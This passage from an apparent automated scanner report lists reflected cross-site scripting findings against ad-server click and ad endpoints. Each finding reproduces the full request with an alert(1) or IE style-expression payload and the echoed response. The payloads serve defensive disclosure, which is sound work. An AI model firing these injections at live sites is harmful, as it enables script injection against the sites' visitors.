The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9448d'-alert(1)-'fc0bfd338ee was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C9448d'-alert(1)-'fc0bfd338ee&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:52:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C9448d'-alert(1)-'fc0bfd338ee&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=http://save.ingdirect.com/promo/promo_set.asp?p=
...[SNIP]...

2.23. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c063b'-alert(1)-'67246c81f2f was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865ccc063b'-alert(1)-'67246c81f2f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:54:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865ccc063b'-alert(1)-'67246c81f2f&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.24. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e68e3'-alert(1)-'7c564df6c49 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178e68e3'-alert(1)-'7c564df6c49&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:53:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178e68e3'-alert(1)-'7c564df6c49&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.25. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f627'-alert(1)-'38dd3681b12 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick1f627'-alert(1)-'38dd3681b12&snx=1290213345&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:53:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick1f627'-alert(1)-'38dd3681b12&snx=1290213345&sn1=618fbb96/abc865cc&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.26. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 442a2'-alert(1)-'cd57e5a21a7 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345442a2'-alert(1)-'cd57e5a21a7&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:54:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345442a2'-alert(1)-'cd57e5a21a7&sn1=618fbb96/abc865cc&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.27. http://vulnerable.verizon.host/adj/N4682.Acerno/B4830992.3 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N4682.Acerno/B4830992.3

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87703'-alert(1)-'a236e466c18 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4682.Acerno/B4830992.3;click=87703'-alert(1)-'a236e466c18 HTTP/1.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?.s1hAHthFwDAHmgAAAAAAHShGgAAAAAAAABUAAIAAAAAAAsAAQABCNJSJAAAAAAACEkjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAONQ8AAAAAAAIAAgAAAAAAAACC9UoI1z89CtejcD3uPwAApkGjc-A.mpmZmZmZ9T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACKK.FG1ggyCb3tmg0XegECrHQPH.ypdrokZj0rAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D300x250%26anmember%3D316%26anprice%3D30%26s%3D1532283%26_salt%3D4222244446%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F%26r%3D1,b657adce-f576-11df-b592-00237d0614d3
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 272
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 21 Nov 2010 14:01:50 GMT
Expires: Sun, 21 Nov 2010 14:01:50 GMT

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a59/4/1c/%2a/n;44306;0-0;0;53018500;1-468/60;0/0/0;;~sscs=%3f87703'-alert(1)-'a236e466c18"><img src="http://s0.2mdn.net/v
...[SNIP]...

2.28. http://vulnerable.verizon.host/click [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /click

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83023"%3balert(1)//6bee66d0b85 was submitted in the h parameter. This input was echoed as 83023";alert(1)//6bee66d0b85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /click;h=v8/3a57/f/340/*/u;224824464;3-0;0;55547540;4307-300/250;36706617/36724495/1;;~sscs=?http:/r.turn.com/r/tpclick/id/0IjLk-tYrjh16QEABQABAA/3c/http:/ads.bluelithium.com/clk?2,13%3Be575beac68a94423%3B12c665a8a07,0%3B%3B%3B2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAB4paZiwBAAAAAAAAADMyZGM1MmYyLWY0MzAtMTFkZi05NWEwLTAwMzA0OGQ2Njg4NgAzmSoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p986bk3%2FM%3D715481.14260249.14149315.1806201%2FD%3Dsports%2FS%3D25664825%3ALREC%2FY%3DYAHOO%2FEXP%3D1290214468%2FL%3DSel8aULEah79SQS9TNcPQwMMrnoX2kznACQACZ3S%2FB%3DPGTMAUJe5lE-%2FJ%3D1290207268687209%2FK%3DLJblLdnMfnL8ntuwJDSBWg%2FA%3D5761153%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,/url/83023"%3balert(1)//6bee66d0b85 HTTP/1.1
Host: vulnerable.verizon.host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 03:33:59 GMT
Connection: close

<html>
<script type="text/javascript">
   function processAdClickUrl() {
       window.top.location.replace("83023";alert(1)//6bee66d0b85?2,13;e575beac68a94423;12c665a8a07,0;;;2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAI
...[SNIP]...

2.29. http://vulnerable.verizon.host/click [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /click

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f1fe"%3balert(1)//424e902531b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f1fe";alert(1)//424e902531b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /click;h=v8/3a57/f/340/*/u;224824464;3-0;0;55547540;4307-300/250;36706617/36724495/1;;~sscs=?http:/r.turn.com/r/tpclick/id/0IjLk-tYrjh16QEABQABAA/3c/http:/ads.bluelithium.com/clk?2,13%3Be575beac68a94423%3B12c665a8a07,0%3B%3B%3B2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAB4paZiwBAAAAAAAAADMyZGM1MmYyLWY0MzAtMTFkZi05NWEwLTAwMzA0OGQ2Njg4NgAzmSoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p986bk3%2FM%3D715481.14260249.14149315.1806201%2FD%3Dsports%2FS%3D25664825%3ALREC%2FY%3DYAHOO%2FEXP%3D1290214468%2FL%3DSel8aULEah79SQS9TNcPQwMMrnoX2kznACQACZ3S%2FB%3DPGTMAUJe5lE-%2FJ%3D1290207268687209%2FK%3DLJblLdnMfnL8ntuwJDSBWg%2FA%3D5761153%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,/url/&2f1fe"%3balert(1)//424e902531b=1 HTTP/1.1
Host: vulnerable.verizon.host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 03:34:10 GMT
Connection: close

<html>
<script type="text/javascript">
   function processAdClickUrl() {
       window.top.location.replace("&2f1fe";alert(1)//424e902531b=1?2,13;e575beac68a94423;12c665a8a07,0;;;2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAA
...[SNIP]...

2.30. http://vulnerable.verizon.host/clk [210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /clk

Issue detail

The value of the 210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df4be"style%3d"x%3aexpression(alert(1))"f02ba6ee934 was submitted in the 210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id parameter. This input was echoed as df4be"style="x:expression(alert(1))"f02ba6ee934 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /clk;210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id=air-cheap-flight-dealsdf4be"style%3d"x%3aexpression(alert(1))"f02ba6ee934&gcid=C11287x638&WT.mc_id=bn30&WT.mc_ev=click HTTP/1.1
Host: vulnerable.verizon.host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=65AA8158EA066D92E8A31EB8E79C4D1D; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: anon=17815415861290224134566; Domain=.orbitz.com; Expires=Fri, 15-Nov-2030 03:35:34 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,0,0,0"; Domain=.orbitz.com; Expires=Fri, 15-Nov-2030 03:35:34 GMT; Path=/
Set-Cookie: BetaGroup="11/19/2010 21:35:34|A|A|N|C|N|H|B|P|N"; Domain=.orbitz.com; Expires=Sat, 04-Dec-2010 03:35:34 GMT; Path=/
Set-Cookie: logging=65AA8158EA066D92E8A31EB8E79C4D1D|egapp10p|; Domain=.orbitz.com; Path=/
Set-Cookie: MKTG="SEM|C11287x638| |1290224134569|bn30| |11/19/2010 21:35:34 PM| | |1"; Domain=.orbitz.com; Expires=Mon, 20-Dec-2010 03:35:34 GMT; Path=/
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/html
Date: Sat, 20 Nov 2010 03:35:34 GMT
Set-Cookie: NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a73945525d5f4f58455e445a4a4217b9;path=/
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 183827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-t
...[SNIP]...
<Meta Name="DCSext.ndid" CONTENT="air-cheap-flight-dealsdf4be"style="x:expression(alert(1))"f02ba6ee934,NC"/>
...[SNIP]...

2.31. http://vulnerable.verizon.host/clk [cnt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /clk

Issue detail

The value of the cnt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beb2f"style%3d"x%3aexpression(alert(1))"1aa717214d2 was submitted in the cnt parameter. This input was echoed as beb2f"style="x:expression(alert(1))"1aa717214d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /clk;210955744;24466695;s?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=ski&cnt=PRObeb2f"style%3d"x%3aexpression(alert(1))"1aa717214d2&gcid=C11287x638&WT.mc_id=bn30&WT.mc_ev=click HTTP/1.1
Host: vulnerable.verizon.host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=85B85A67F46114EF05E439166A0257A3; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: anon=2658358851290224164552; Domain=.orbitz.com; Expires=Fri, 15-Nov-2030 03:36:04 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,0,0,0"; Domain=.orbitz.com; Expires=Fri, 15-Nov-2030 03:36:04 GMT; Path=/
Set-Cookie: BetaGroup="11/19/2010 21:36:04|B|A|N|C|N|H|B|P|N"; Domain=.orbitz.com; Expires=Sat, 04-Dec-2010 03:36:04 GMT; Path=/
Set-Cookie: logging=85B85A67F46114EF05E439166A0257A3|egapp56p|; Domain=.orbitz.com; Path=/
Set-Cookie: MKTG="SEM|C11287x638| |1290224164555|bn30| |11/19/2010 21:36:04 PM| | |1"; Domain=.orbitz.com; Expires=Mon, 20-Dec-2010 03:36:04 GMT; Path=/
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/html
Date: Sat, 20 Nov 2010 03:36:03 GMT
Set-Cookie: NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3272945525d5f4f58455e445a4a4217b9;path=/
